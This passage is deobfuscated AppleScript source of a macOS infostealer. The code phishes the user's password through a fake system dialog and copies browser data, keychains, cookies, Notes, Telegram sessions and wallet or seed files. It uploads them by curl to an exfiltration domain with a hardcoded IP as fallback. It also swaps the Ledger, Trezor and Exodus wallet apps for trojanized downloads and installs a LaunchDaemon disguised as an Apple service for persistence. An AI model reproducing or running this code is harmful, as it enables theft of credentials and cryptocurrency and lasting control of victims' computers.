set hwyksoup69 to "age/leveldb/" -- DECODED
if ((jrwsevlksd as string) is equal to (hwyksoup62 & hwyksoup63 & hwyksoup64 & hwyksoup65 & hwyksoup66)) then
if hasTargetExtension(sourcePath, targetExtensionIds) then
set foundTargetExt to true
end if
stealMatchingDirs(sourcePath, bnrjxjahl & profileName, targetExtensionIds, false)
else if (jrwsevlksd as string) is equal to hwyksoup67 then
if hasTargetExtension(sourcePath, targetExtensionIds) then
set foundTargetExt to true
end if
stealMatchingDirs(sourcePath, bnrjxjahl & profileName, targetExtensionIds, true)
else if (jrwsevlksd as string) is equal to (hwyksoup68 & hwyksoup69) then
if foundTargetExt then
set hwyksoup70 to "/Local " -- DECODED
set hwyksoup71 to "Storage" -- DECODED
set hwyksoup72 to "/leveld" -- DECODED
set hwyksoup73 to "b/" -- DECODED
set destPath to bnrjxjahl & profileName & (hwyksoup70 & hwyksoup71 & hwyksoup72 & hwyksoup73)
copyDirectoryRecursive(sourcePath, destPath)
end if
else
set destPath to bnrjxjahl & profileName & rrdkrigk
copyFile(sourcePath, destPath)
end if
end repeat
end if
end repeat
end try
end repeat
end stealChromiumBrowserData
on validatePassword(username, password)
try
set hwyksoup74 to "dscl . authonly " -- DECODED
set cmdResult to do shell script hwyksoup74 & quoted form of username & space & quoted form of password
if cmdResult is not equal to "" then
return false
else
return true
end if
on error
return false
end try
end validatePassword
on promptForPassword(username, stagingDir)
try
if validatePassword(username, "") then
set hwyksoup75 to "security 2>&1 > /de" -- DECODED
set hwyksoup76 to "v/null find-generic" -- DECODED
set hwyksoup77 to "-password -ga 'Chro" -- DECODED
set hwyksoup78 to "me' | awk '{print $" -- DECODED
set hwyksoup79 to "2}'" -- DECODED
set chromePassword to do shell script (hwyksoup75 & hwyksoup76 & hwyksoup77 & hwyksoup78 & hwyksoup79)
set hwyksoup80 to "masterpass-chrome" -- DECODED
writeToFile(chromePassword as string, stagingDir & hwyksoup80)
else
set firstAttempt to true
repeat
if firstAttempt then
set hwyksoup81 to "macOS wants to make changes. " -- DECODED
set hwyksoup82 to "Enter the password for user \"" -- DECODED
set hwyksoup83 to "\" to allow this." -- DECODED
set promptMsg to (hwyksoup81 & hwyksoup82) & username & hwyksoup83
else
set hwyksoup84 to "The password you entered is incorrect" -- DECODED
set hwyksoup85 to ". Please enter the password for user \"" -- DECODED
set promptMsg to (hwyksoup84 & hwyksoup85) & username & "\"."
end if
set hwyksoup86 to "macOS" -- DECODED
set ttkbntvgcena to display dialog promptMsg default answer "" with icon caution buttons {"OK"} default button "OK" with hidden answer with title hwyksoup86
set enteredPassword to text returned of ttkbntvgcena
set firstAttempt to false
if validatePassword(username, enteredPassword) then
return enteredPassword
end if
end repeat
end if
end try
return ""
end promptForPassword
on stealSafariKeychainNotes(stagingDir)
try
set hwyksoup87 to "FileGrabber/" -- DECODED
set grabberDir to stagingDir & hwyksoup87
set grabberPosix to POSIX file grabberDir
set hwyksoup88 to "NotesMedia/" -- DECODED
set mediaOutputDir to POSIX file (grabberDir & hwyksoup88)
set hwyksoup89 to "txt" -- DECODED
set hwyksoup90 to "pdf" -- DECODED
set hwyksoup91 to "docx" -- DECODED
set hwyksoup92 to "wallet" -- DECODED
set hwyksoup93 to "key" -- DECODED
set hwyksoup94 to "keys" -- DECODED
set hwyksoup95 to "doc" -- DECODED
set hwyksoup96 to "jpeg" -- DECODED
set hwyksoup97 to "png" -- DECODED
set hwyksoup98 to "kdbx" -- DECODED
set hwyksoup99 to "rtf" -- DECODED
set hwyksoup100 to "jpg" -- DECODED
set hwyksoup101 to "seed" -- DECODED
set targetFileExts to {hwyksoup89, hwyksoup90, hwyksoup91, hwyksoup92, hwyksoup93, hwyksoup94, hwyksoup95, hwyksoup96, hwyksoup97, hwyksoup98, hwyksoup99, hwyksoup100, hwyksoup101}
set fileSizeTotal to 0
set mediaSizeTotal to 0
set hwyksoup102 to "system_profiler SPHardwareDataT" -- DECODED
set hwyksoup103 to "ype | awk '/UUID/ { print $3 }'" -- DECODED
set keychainUuid to do shell script (hwyksoup102 & hwyksoup103)
mkdirPath(grabberPosix)
mkdirPath(mediaOutputDir)
tell application "Finder"
try
set rildrfevav to (path to home folder as text) & "Library:Cookies:"
set ncpqxcuhj to (rildrfevav & "Cookies.binarycookies")
duplicate (file ncpqxcuhj) to (folder grabberPosix) with replacing
set name of result to "saf1"
end try
set guboelkchm to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")
try
duplicate (file "Cookies.binarycookies" of folder guboelkchm) to (folder grabberPosix) with replacing
end try
set jbecclcedtyl to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"
try
set tlsrtylmajau to folder jbecclcedtyl
set vhnnxmqzut to {"NoteStore.sqlite", "NoteStore.sqlite-shm", "NoteStore.sqlite-wal"}
repeat with zrvojtlq in vhnnxmqzut
try
duplicate (file zrvojtlq of tlsrtylmajau) to (folder grabberPosix) with replacing
end try
end repeat
end try
set hvszawhl to (jbecclcedtyl & "Accounts:")
try
set lrxklaspaprl to folder hvszawhl
set bufxiyco to every folder of lrxklaspaprl
repeat with pkdjfjnpjmh in bufxiyco
set jhjqlrzst to hvszawhl & name of pkdjfjnpjmh & ":Media:"
set atfawjidrm to every folder of (folder jhjqlrzst)
repeat with iamudktaa in atfawjidrm
set ohovkfcak to jhjqlrzst & name of iamudktaa
set gowuvhzxmrf to every folder of (folder ohovkfcak)
repeat with whnnfrssbx in gowuvhzxmrf
set bpdximpszke to every file of whnnfrssbx
repeat with noanigilaci in bpdximpszke
try
set uhjlmkmn to size of noanigilaci as text
set mediaSizeTotal to mediaSizeTotal + uhjlmkmn
if mediaSizeTotal < 30 * 1024 * 1024 then
duplicate noanigilaci to mediaOutputDir with replacing
else
exit repeat
end if
end try
end repeat
end repeat
end repeat
end repeat
end try
try
set efwwdlxecjb to (path to library folder from user domain as text) & "Safari:"
duplicate (file "Form Values" of folder efwwdlxecjb) to grabberPosix with replacing
end try
try
set ecbyemblka to (path to library folder from user domain as text) & "Keychains:" & keychainUuid
duplicate (folder ecbyemblka) to grabberPosix with replacing
end try
try
set rmpbnwdevbv to every file of desktop
set zmppantsdrp to every file of folder "Documents" of (path to home folder)
repeat with ddhtfsuoh in (rmpbnwdevbv & zmppantsdrp)
set abuxgwuwnwnd to name extension of ddhtfsuoh
if abuxgwuwnwnd is in targetFileExts then
set uhjlmkmn to size of ddhtfsuoh
if (fileSizeTotal + uhjlmkmn) < 30 * 1024 * 1024 then
try
duplicate ddhtfsuoh to (folder grabberPosix) with replacing
set fileSizeTotal to fileSizeTotal + uhjlmkmn
end try
else
exit repeat
end if
end if
end repeat
end try
end tell
end try
end stealSafariKeychainNotes
on stealAppleNotes(stagingDir)
try
set notesText to ""
set tdvqikmfhaje to 0
tell application "Notes"
set notesList to {}
set yssphqkuz to every account
repeat with tennnblkevqi in yssphqkuz
try
set gsmctkynl to properties of every note in tennnblkevqi
set tdvqikmfhaje to tdvqikmfhaje + (length of gsmctkynl)
repeat with zfdtgahniyq in gsmctkynl
try
set gedjyiwjq to (creation date of zfdtgahniyq) & return & (body of zfdtgahniyq)
copy gedjyiwjq to end of notesList
end try
end repeat
end try
end repeat
set notesText to notesList as text
end tell
if tdvqikmfhaje > 0 then
set hwyksoup104 to "<h1>Notes Count: " -- DECODED
set hwyksoup105 to "</h1> <br><br><br> " -- DECODED
set notesHtml to hwyksoup104 & (tdvqikmfhaje as text) & hwyksoup105 & notesText
set hwyksoup106 to "FileGrabber" -- DECODED
set hwyksoup107 to "/notes.html" -- DECODED
writeToFile(notesHtml, stagingDir & (hwyksoup106 & hwyksoup107))
end if
end try
end stealAppleNotes
on stealTelegramData(stagingDir, appDataDir)
try
set hwyksoup108 to "Telegram De" -- DECODED
set hwyksoup109 to "sktop/tdata/" -- DECODED
set telegramDataDir to appDataDir & (hwyksoup108 & hwyksoup109)
set hwyksoup110 to "Telegram Data/" -- DECODED
set telegramOutputDir to stagingDir & hwyksoup110
set hwyksoup111 to "key_datas" -- DECODED
set hwyksoup112 to "key_datas" -- DECODED
copyFile(telegramDataDir & hwyksoup111, telegramOutputDir & hwyksoup112)
set fxzagdbqdc to list folder telegramDataDir without invisibles
set ktijoouxit to {}
repeat with itemName in fxzagdbqdc
set xemnagxey to itemName & "s"
if xemnagxey is in fxzagdbqdc then
copy itemName to end of ktijoouxit
end if
end repeat
repeat with alcdtgkrwxd in ktijoouxit
copyFile(telegramDataDir & alcdtgkrwxd & "s", telegramOutputDir & alcdtgkrwxd & "s")
set hwyksoup113 to "/maps" -- DECODED
set hwyksoup114 to "/maps" -- DECODED
copyFile(telegramDataDir & alcdtgkrwxd & hwyksoup113, telegramOutputDir & alcdtgkrwxd & hwyksoup114)
end repeat
end try
end stealTelegramData
on uploadLargeFile(exfilUrl, username, buildId, clientId, chunkNum)
set icqqrkvfb to 26214400
set hwyksoup115 to "-H \"user: " -- DECODED
set hwyksoup116 to "\" -H \"BuildID: " -- DECODED
set hwyksoup117 to "\" -H \"cl: " -- DECODED
set hwyksoup118 to "\" -H \"cn: " -- DECODED
set curlHeaders to hwyksoup115 & username & hwyksoup116 & buildId & hwyksoup117 & clientId & hwyksoup118 & chunkNum & "\""
set hwyksoup119 to "stat -f%z /" -- DECODED
set hwyksoup120 to "tmp/out.zip" -- DECODED
set uhjlmkmn to (do shell script (hwyksoup119 & hwyksoup120)) as integer
if uhjlmkmn is less than or equal to icqqrkvfb then
uploadSmallFile(exfilUrl, curlHeaders)
return
end if
set hwyksoup121 to "split -b " -- DECODED
set hwyksoup122 to " /tmp/" -- DECODED
set hwyksoup123 to "out.zi" -- DECODED
set hwyksoup124 to "p /tmp" -- DECODED
set hwyksoup125 to "/chunk_" -- DECODED
do shell script hwyksoup121 & icqqrkvfb & (hwyksoup122 & hwyksoup123 & hwyksoup124 & hwyksoup125)
set hwyksoup126 to "head -c 8 " -- DECODED
set hwyksoup127 to "/dev/urand" -- DECODED
set hwyksoup128 to "om | xxd -p" -- DECODED
set uploadId to do shell script (hwyksoup126 & hwyksoup127 & hwyksoup128)
set hwyksoup129 to "ls -1 " -- DECODED
set hwyksoup130 to "/tmp/c" -- DECODED
set hwyksoup131 to "hunk_*" -- DECODED
set hwyksoup132 to " | sort" -- DECODED
set chunkList to paragraphs of (do shell script (hwyksoup129 & hwyksoup130 & hwyksoup131 & hwyksoup132))
set chunkCount to count of chunkList
set allUploaded to true
repeat with qpoczvgi from 1 to chunkCount
set chunkFile to item qpoczvgi of chunkList
set chunkIndex to (qpoczvgi - 1) as text
set hwyksoup133 to " -H \"X-Chunk-ID: " -- DECODED
set hwyksoup134 to "\" -H \"X-Chunk-Part: " -- DECODED
set hwyksoup135 to "\" -H \"X-Ch" -- DECODED
set hwyksoup136 to "unk-Total: " -- DECODED
set chunkCurlCmd to curlHeaders & hwyksoup133 & uploadId & hwyksoup134 & chunkIndex & (hwyksoup135 & hwyksoup136) & (chunkCount as text) & "\""
set uploadSuccess to false
repeat with zgkrofrw from 1 to 3
try
set hwyksoup137 to "curl --conne" -- DECODED
set hwyksoup138 to "ct-timeout 1" -- DECODED
set hwyksoup139 to "20 --max-tim" -- DECODED
set hwyksoup140 to "e 300 -X POS" -- DECODED
set hwyksoup141 to "T " -- DECODED
set hwyksoup142 to " -F \"file=@" -- DECODED
set hwyksoup143 to "/contact" -- DECODED
do shell script (hwyksoup137 & hwyksoup138 & hwyksoup139 & hwyksoup140 & hwyksoup141) & chunkCurlCmd & hwyksoup142 & chunkFile & "\" " & exfilUrl & hwyksoup143
set uploadSuccess to true
exit repeat
end try
delay 10
end repeat
if not uploadSuccess then
set allUploaded to false
end if
end repeat
set hwyksoup144 to "rm -f /tmp/chunk_*" -- DECODED
do shell script hwyksoup144
if allUploaded then return
set hwyksoup145 to "http://92.246.136.14" -- DECODED
set fallbackUrl to hwyksoup145
repeat with zgkrofrw from 1 to 3
try
set hwyksoup146 to "curl --connect-t" -- DECODED
set hwyksoup147 to "imeout 180 --max" -- DECODED
set hwyksoup148 to "-time 600 -X POS" -- DECODED
set hwyksoup149 to "T " -- DECODED
set hwyksoup150 to " -F \"file=@/" -- DECODED
set hwyksoup151 to "tmp/out.zip\" " -- DECODED
set hwyksoup152 to "/contact" -- DECODED
set fallbackCmd to (hwyksoup146 & hwyksoup147 & hwyksoup148 & hwyksoup149) & curlHeaders & (hwyksoup150 & hwyksoup151) & fallbackUrl & hwyksoup152
do shell script fallbackCmd
return
end try
delay 15
end repeat
end uploadLargeFile
on uploadSmallFile(exfilUrl, curlHeaders)
repeat with zgkrofrw from 1 to 3
try
set hwyksoup153 to "curl --connect-timeout 12" -- DECODED
set hwyksoup154 to "0 --max-time 300 -X POST " -- DECODED
set hwyksoup155 to " -F \"file=@/" -- DECODED
set hwyksoup156 to "tmp/out.zip\" " -- DECODED
set hwyksoup157 to "/contact" -- DECODED
do shell script (hwyksoup153 & hwyksoup154) & curlHeaders & (hwyksoup155 & hwyksoup156) & exfilUrl & hwyksoup157
return
end try
delay 15
end repeat
set hwyksoup158 to "http://92.246.136.14" -- DECODED
set fallbackUrl to hwyksoup158
repeat with zgkrofrw from 1 to 3
try
set hwyksoup159 to "curl --connect-t" -- DECODED
set hwyksoup160 to "imeout 120 --max" -- DECODED
set hwyksoup161 to "-time 300 -X POS" -- DECODED
set hwyksoup162 to "T " -- DECODED
set hwyksoup163 to " -F \"f" -- DECODED
set hwyksoup164 to "ile=@/" -- DECODED
set hwyksoup165 to "tmp/ou" -- DECODED
set hwyksoup166 to "t.zip\" " -- DECODED
set hwyksoup167 to "/contact" -- DECODED
do shell script (hwyksoup159 & hwyksoup160 & hwyksoup161 & hwyksoup162) & curlHeaders & (hwyksoup163 & hwyksoup164 & hwyksoup165 & hwyksoup166) & fallbackUrl & hwyksoup167
return
end try
delay 15
end repeat
end uploadSmallFile
on trojanizeLedger(outputDir, appPassword, c2Domain)
try
set hwyksoup168 to "/Applicati" -- DECODED
set hwyksoup169 to "ons/Ledger" -- DECODED
set hwyksoup170 to " Wallet.app" -- DECODED
set appInstallPath to (hwyksoup168 & hwyksoup169 & hwyksoup170)
list folder POSIX file appInstallPath
set hwyksoup171 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup171
set hwyksoup172 to "rm -f " -- DECODED
do shell script hwyksoup172 & quoted form of filePath
set hwyksoup173 to "user10" -- DECODED
set hwyksoup174 to "/.logged" -- DECODED
writeToFile(hwyksoup173, outputDir & hwyksoup174)
set hwyksoup175 to "curl https://" -- DECODED
set hwyksoup176 to "/zxc/app." -- DECODED
set hwyksoup177 to "zip -o /t" -- DECODED
set hwyksoup178 to "mp/app.zip" -- DECODED
do shell script hwyksoup175 & c2Domain & (hwyksoup176 & hwyksoup177 & hwyksoup178)
try
set hwyksoup179 to "pkill" -- DECODED
set hwyksoup180 to " \"Led" -- DECODED
set hwyksoup181 to "ger W" -- DECODED
set hwyksoup182 to "allet\"" -- DECODED
do shell script (hwyksoup179 & hwyksoup180 & hwyksoup181 & hwyksoup182)
end try
set hwyksoup183 to "echo " -- DECODED
set hwyksoup184 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup183 & quoted form of appPassword & hwyksoup184 & quoted form of appInstallPath
delay 1
set hwyksoup185 to "ditto -x -k " -- DECODED
set hwyksoup186 to "/tmp/app.zip" -- DECODED
set hwyksoup187 to " /Applicatio" -- DECODED
set hwyksoup188 to "ns" -- DECODED
do shell script (hwyksoup185 & hwyksoup186 & hwyksoup187 & hwyksoup188)
delay 1
set hwyksoup189 to "chmod -R +x " -- DECODED
do shell script hwyksoup189 & quoted form of appInstallPath
delay 1
set hwyksoup190 to "rm /tmp/app.zip" -- DECODED
do shell script hwyksoup190
end try
end trojanizeLedger
on trojanizeTrezor(outputDir, appPassword, c2Domain)
try
set hwyksoup191 to "/Applicati" -- DECODED
set hwyksoup192 to "ons/Trezor" -- DECODED
set hwyksoup193 to " Suite.app" -- DECODED
set appInstallPath to (hwyksoup191 & hwyksoup192 & hwyksoup193)
list folder POSIX file appInstallPath
set hwyksoup194 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup194
set hwyksoup195 to "rm -f " -- DECODED
do shell script hwyksoup195 & quoted form of filePath
set hwyksoup196 to "user10" -- DECODED
set hwyksoup197 to "/.logged" -- DECODED
writeToFile(hwyksoup196, outputDir & hwyksoup197)
set hwyksoup198 to "curl https://" -- DECODED
set hwyksoup199 to "/zxc/apptwo.zip -" -- DECODED
set hwyksoup200 to "o /tmp/apptwo.zip" -- DECODED
do shell script hwyksoup198 & c2Domain & (hwyksoup199 & hwyksoup200)
try
set hwyksoup201 to "pkill \"Trezor Suite\"" -- DECODED
do shell script hwyksoup201
end try
set hwyksoup202 to "echo " -- DECODED
set hwyksoup203 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup202 & quoted form of appPassword & hwyksoup203 & quoted form of appInstallPath
delay 1
set hwyksoup204 to "ditto -x -k /tmp/app" -- DECODED
set hwyksoup205 to "two.zip /Applications" -- DECODED
do shell script (hwyksoup204 & hwyksoup205)
delay 1
set hwyksoup206 to "chmod -R +x " -- DECODED
do shell script hwyksoup206 & quoted form of appInstallPath
delay 1
set hwyksoup207 to "rm /tmp/apptwo.zip" -- DECODED
do shell script hwyksoup207
end try
end trojanizeTrezor
on trojanizeExodus(outputDir, appPassword, c2Domain)
try
set hwyksoup208 to "/Application" -- DECODED
set hwyksoup209 to "s/Exodus.app" -- DECODED
set appInstallPath to (hwyksoup208 & hwyksoup209)
list folder POSIX file appInstallPath
set hwyksoup210 to "/.logged" -- DECODED
set filePath to outputDir & hwyksoup210
set hwyksoup211 to "rm -f " -- DECODED
do shell script hwyksoup211 & quoted form of filePath
set hwyksoup212 to "user10" -- DECODED
set hwyksoup213 to "/.logged" -- DECODED
writeToFile(hwyksoup212, outputDir & hwyksoup213)
set hwyksoup214 to "curl https://" -- DECODED
set hwyksoup215 to "/zxc/app" -- DECODED
set hwyksoup216 to "ex.zip -" -- DECODED
set hwyksoup217 to "o /tmp/a" -- DECODED
set hwyksoup218 to "ppex.zip" -- DECODED
do shell script hwyksoup214 & c2Domain & (hwyksoup215 & hwyksoup216 & hwyksoup217 & hwyksoup218)
try
set hwyksoup219 to "pkill \"Exodus\"" -- DECODED
do shell script hwyksoup219
end try
set hwyksoup220 to "echo " -- DECODED
set hwyksoup221 to " | sudo -S rm -r " -- DECODED
do shell script hwyksoup220 & quoted form of appPassword & hwyksoup221 & quoted form of appInstallPath
delay 1
set hwyksoup222 to "ditto -x -" -- DECODED
set hwyksoup223 to "k /tmp/app" -- DECODED
set hwyksoup224 to "ex.zip /Ap" -- DECODED
set hwyksoup225 to "plications" -- DECODED
do shell script (hwyksoup222 & hwyksoup223 & hwyksoup224 & hwyksoup225)
delay 1
set hwyksoup226 to "chmod -R +x " -- DECODED
do shell script hwyksoup226 & quoted form of appInstallPath
delay 1
set hwyksoup227 to "rm /tmp/appex.zip" -- DECODED
do shell script hwyksoup227
end try
end trojanizeExodus
on installPersistence(rzirjmnmshvz, ozkyftlcqnmz, c2Url)
try
set hwyksoup228 to "/Library/App" -- DECODED
set hwyksoup229 to "lication Sup" -- DECODED
set hwyksoup230 to "port/.com.ap" -- DECODED
set hwyksoup231 to "ple.accountsd" -- DECODED
set botDir to rzirjmnmshvz & (hwyksoup228 & hwyksoup229 & hwyksoup230 & hwyksoup231)
set hwyksoup232 to "/AccountsHelper" -- DECODED
set botBinary to botDir & hwyksoup232
set hwyksoup233 to "/.service" -- DECODED
set agentScriptPath to botDir & hwyksoup233
set hwyksoup234 to "com.ap" -- DECODED
set hwyksoup235 to "ple.ac" -- DECODED
set hwyksoup236 to "counts" -- DECODED
set hwyksoup237 to "d.help" -- DECODED
set hwyksoup238 to "er" -- DECODED
set launchDaemonLabel to (hwyksoup234 & hwyksoup235 & hwyksoup236 & hwyksoup237 & hwyksoup238)
set hwyksoup239 to "/Library/La" -- DECODED
set hwyksoup240 to "unchDaemons/" -- DECODED
set hwyksoup241 to ".plist" -- DECODED
set launchDaemonPlist to (hwyksoup239 & hwyksoup240) & launchDaemonLabel & hwyksoup241
set hwyksoup242 to "mkdir -p " -- DECODED
do shell script hwyksoup242 & quoted form of botDir
set hwyksoup243 to "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://ww" -- DECODED
set hwyksoup244 to "w.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
<dict>
<key>Label</key>
<string>" -- DECODED
set hwyksoup245 to "</string>
<key>Program" -- DECODED
set hwyksoup246 to "Arguments</key>
<array" -- DECODED
set hwyksoup247 to ">
<string>/bin/bas" -- DECODED
set hwyksoup248 to "h</string>
<string>" -- DECODED
set hwyksoup249 to "</string>
</array>
<key>RunAt" -- DECODED
set hwyksoup250 to "Load</key>
<true/>
<key>KeepA" -- DECODED
set hwyksoup251 to "live</key>
<true/>
</dict>
</plis" -- DECODED
set hwyksoup252 to "t>" -- DECODED
set plistContent to (hwyksoup243 & hwyksoup244) & launchDaemonLabel & (hwyksoup245 & hwyksoup246 & hwyksoup247 & hwyksoup248) & agentScriptPath & (hwyksoup249 & hwyksoup250 & hwyksoup251 & hwyksoup252)
set hwyksoup253 to "curl -o " -- DECODED
set hwyksoup254 to " https://" -- DECODED
set hwyksoup255 to "/zxc/kito" -- DECODED
do shell script hwyksoup253 & quoted form of botBinary & hwyksoup254 & c2Url & hwyksoup255
set hwyksoup256 to "chmod +x " -- DECODED
do shell script hwyksoup256 & quoted form of botBinary
set hwyksoup257 to "while true; do
osascript <<EOF
set loginContent to do shell script \"stat -f \\"%Su\\" /dev/console\"
if loginContent is " -- DECODED
set hwyksoup258 to "not equal to \"\" and loginContent is not equal to \"root\"
do shell script \"sudo -u \" & quoted form of loginContent & \" " -- DECODED
set hwyksoup259 to "\"
end i" -- DECODED
set hwyksoup260 to "f
EOF
" -- DECODED
set hwyksoup261 to " slee" -- DECODED
set hwyksoup262 to "p 1
done" -- DECODED
set agentScript to (hwyksoup257 & hwyksoup258) & quoted form of botBinary & (hwyksoup259 & hwyksoup260 & hwyksoup261 & hwyksoup262)
writeToFile(agentScript, agentScriptPath)
set hwyksoup263 to "/tmp/starter" -- DECODED
writeToFile(plistContent, hwyksoup263)
set hwyksoup264 to "chmod +x " -- DECODED
do shell script hwyksoup264 & quoted form of agentScriptPath
set hwyksoup265 to "echo " -- DECODED
set hwyksoup266 to " | sudo -" -- DECODED
set hwyksoup267 to "S cp /tmp" -- DECODED
set hwyksoup268 to "/starter " -- DECODED
do shell script hwyksoup265 & quoted form of ozkyftlcqnmz & (hwyksoup266 & hwyksoup267 & hwyksoup268) & launchDaemonPlist
set hwyksoup269 to "echo " -- DECODED
set hwyksoup270 to " | sudo -" -- DECODED
set hwyksoup271 to "S chown r" -- DECODED
set hwyksoup272 to "oot:wheel " -- DECODED
do shell script hwyksoup269 & quoted form of ozkyftlcqnmz & (hwyksoup270 & hwyksoup271 & hwyksoup272) & launchDaemonPlist
set hwyksoup273 to "echo " -- DECODED
set hwyksoup274 to " | sudo " -- DECODED
set hwyksoup275 to "-S launc" -- DECODED
set hwyksoup276 to "hctl loa" -- DECODED
set hwyksoup277 to "d " -- DECODED
do shell script hwyksoup273 & quoted form of ozkyftlcqnmz & (hwyksoup274 & hwyksoup275 & hwyksoup276 & hwyksoup277) & launchDaemonPlist
end try
end installPersistence
on run
set hwyksoup278 to "true" -- DECODED
set platformFlag to hwyksoup278
set hwyksoup279 to "true" -- DECODED
set osFlag to hwyksoup279
set hwyksoup280 to "false" -- DECODED
set buildFlag to hwyksoup280
set hwyksoup281 to "USER" -- DECODED
set currentUser to (system attribute hwyksoup281)
set hwyksoup282 to "/Users/" -- DECODED
set homeDir to hwyksoup282 & currentUser
set hwyksoup283 to "s1Hm3Q1X6G/f6c" -- DECODED
set hwyksoup284 to "72cNHCapbyytW3" -- DECODED
set hwyksoup285 to "wcp3tbz6dKg8ee" -- DECODED
set hwyksoup286 to "c=" -- DECODED
set configData to (hwyksoup283 & hwyksoup284 & hwyksoup285 & hwyksoup286)
set hwyksoup287 to "1OVqyOU/n3-4zK" -- DECODED
set hwyksoup288 to "VSjFsNK88S2buJ" -- DECODED
set hwyksoup289 to "zuW3rNaXRCJ1l4" -- DECODED
set hwyksoup290 to "Q=" -- DECODED
set buildId to (hwyksoup287 & hwyksoup288 & hwyksoup289 & hwyksoup290)
set hwyksoup291 to "https://mpasvw.com" -- DECODED
set exfilUrl to hwyksoup291
set clientId to "0"
set chunkNum to "0"
set hwyksoup292 to "aforvm.com" -- DECODED
set c2Url to hwyksoup292
set hwyksoup293 to "/Library/Applica" -- DECODED
set hwyksoup294 to "tion Support/.co" -- DECODED
set hwyksoup295 to "m.apple.accountsd" -- DECODED
set botSupportDir to homeDir & (hwyksoup293 & hwyksoup294 & hwyksoup295)
set hwyksoup296 to "mkdir -p " -- DECODED
do shell script hwyksoup296 & quoted form of botSupportDir
try
set hwyksoup297 to "rm -f " -- DECODED
set hwyksoup298 to "/.cfg" -- DECODED
do shell script hwyksoup297 & quoted form of (botSupportDir & hwyksoup298)
end try
try
set hwyksoup299 to "rm -f " -- DECODED
set hwyksoup300 to "/.service" -- DECODED
do shell script hwyksoup299 & quoted form of (botSupportDir & hwyksoup300)
end try
try
set hwyksoup301 to "rm -f /tmp/starter" -- DECODED
do shell script hwyksoup301
end try
set hwyksoup302 to "/.cfg" -- DECODED
writeToFile(configData, botSupportDir & hwyksoup302)
set randomId to (random number from 10000 to 100000) as text
set hwyksoup303 to "/tmp/" -- DECODED
set tmpStagingDir to hwyksoup303 & randomId & "/"
try
set hwyksoup304 to "system_profiler SP" -- DECODED
set hwyksoup305 to "SoftwareDataType S" -- DECODED
set hwyksoup306 to "PHardwareDataType " -- DECODED
set hwyksoup307 to "SPDisplaysDataType" -- DECODED
set systemInfo to (do shell script (hwyksoup304 & hwyksoup305 & hwyksoup306 & hwyksoup307))
set hwyksoup308 to "info" -- DECODED
writeToFile(systemInfo, tmpStagingDir & hwyksoup308)
end try
set hwyksoup309 to "/Library/" -- DECODED
set appSupportDir to homeDir & hwyksoup309
set hwyksoup310 to "Application Support/" -- DECODED
set appDataDir to appSupportDir & hwyksoup310
set hwyksoup311 to "/.auth" -- DECODED
set storedPassword to readFileContents(botSupportDir & hwyksoup311)
if not validatePassword(currentUser, storedPassword) then
set storedPassword to promptForPassword(currentUser, tmpStagingDir)
set hwyksoup312 to "/.auth" -- DECODED
writeToFile(storedPassword, botSupportDir & hwyksoup312)
end if
delay 0.01
set hwyksoup313 to "pwd" -- DECODED
writeToFile(storedPassword, tmpStagingDir & hwyksoup313)
set hwyksoup314 to "Group Contain" -- DECODED
set hwyksoup315 to "ers/group.com" -- DECODED
set hwyksoup316 to ".apple.notes/" -- DECODED
set hwyksoup317 to "NoteStore.sql" -- DECODED
set hwyksoup318 to "ite" -- DECODED
set noteStoreDir to appSupportDir & (hwyksoup314 & hwyksoup315 & hwyksoup316 & hwyksoup317 & hwyksoup318)
set hwyksoup319 to "FileGra" -- DECODED
set hwyksoup320 to "bber/No" -- DECODED
set hwyksoup321 to "teStore" -- DECODED
set hwyksoup322 to ".sqlite" -- DECODED
copyFile(noteStoreDir, tmpStagingDir & (hwyksoup319 & hwyksoup320 & hwyksoup321 & hwyksoup322))
set hwyksoup323 to "-wal" -- DECODED
set hwyksoup324 to "FileGrabbe" -- DECODED
set hwyksoup325 to "r/NoteStor" -- DECODED
set hwyksoup326 to "e.sqlite-w" -- DECODED
set hwyksoup327 to "al" -- DECODED
copyFile(noteStoreDir & hwyksoup323, tmpStagingDir & (hwyksoup324 & hwyksoup325 & hwyksoup326 & hwyksoup327))
set hwyksoup328 to "-shm" -- DECODED
set hwyksoup329 to "FileGrabber/Note" -- DECODED
set hwyksoup330 to "Store.sqlite-shm" -- DECODED
copyFile(noteStoreDir & hwyksoup328, tmpStagingDir & (hwyksoup329 & hwyksoup330))
set hwyksoup331 to "Containers/com.apple.Safari/Data/Li" -- DECODED
set hwyksoup332 to "brary/Cookies/Cookies.binarycookies" -- DECODED
set hwyksoup333 to "FileGrabber/Cook" -- DECODED
set hwyksoup334 to "ies.binarycookies" -- DECODED
copyFile(appSupportDir & (hwyksoup331 & hwyksoup332), tmpStagingDir & (hwyksoup333 & hwyksoup334))
set hwyksoup335 to "Cookies" -- DECODED
set hwyksoup336 to "/Cookie" -- DECODED
set hwyksoup337 to "s.binar" -- DECODED
set hwyksoup338 to "ycookies" -- DECODED
set hwyksoup339 to "FileGrabber/saf1" -- DECODED
copyFile(appSupportDir & (hwyksoup335 & hwyksoup336 & hwyksoup337 & hwyksoup338), tmpStagingDir & hwyksoup339)
set hwyksoup340 to "true" -- DECODED
if platformFlag is equal to hwyksoup340 then
stealSafariKeychainNotes(tmpStagingDir)
end if
set hwyksoup341 to "OpenVPN Conn" -- DECODED
set hwyksoup342 to "ect/profiles/" -- DECODED
set hwyksoup343 to "OpenVPN" -- DECODED
copyDirectoryRecursive(appSupportDir & (hwyksoup341 & hwyksoup342), tmpStagingDir & hwyksoup343)
try
set installedApps to ""
set hwyksoup344 to "/Applications" -- DECODED
set qvnqwdflcckc to list folder hwyksoup344
repeat with ncrhtobbqi in qvnqwdflcckc
set installedApps to installedApps & ncrhtobbqi & return
end repeat
set hwyksoup345 to "installedSoft" -- DECODED
writeToFile(installedApps, tmpStagingDir & hwyksoup345)
end try
set hwyksoup346 to "true" -- DECODED
if osFlag is equal to hwyksoup346 then
try
set hwyksoup347 to "FileGra" -- DECODED
set hwyksoup348 to "bber/No" -- DECODED
set hwyksoup349 to "teStore" -- DECODED
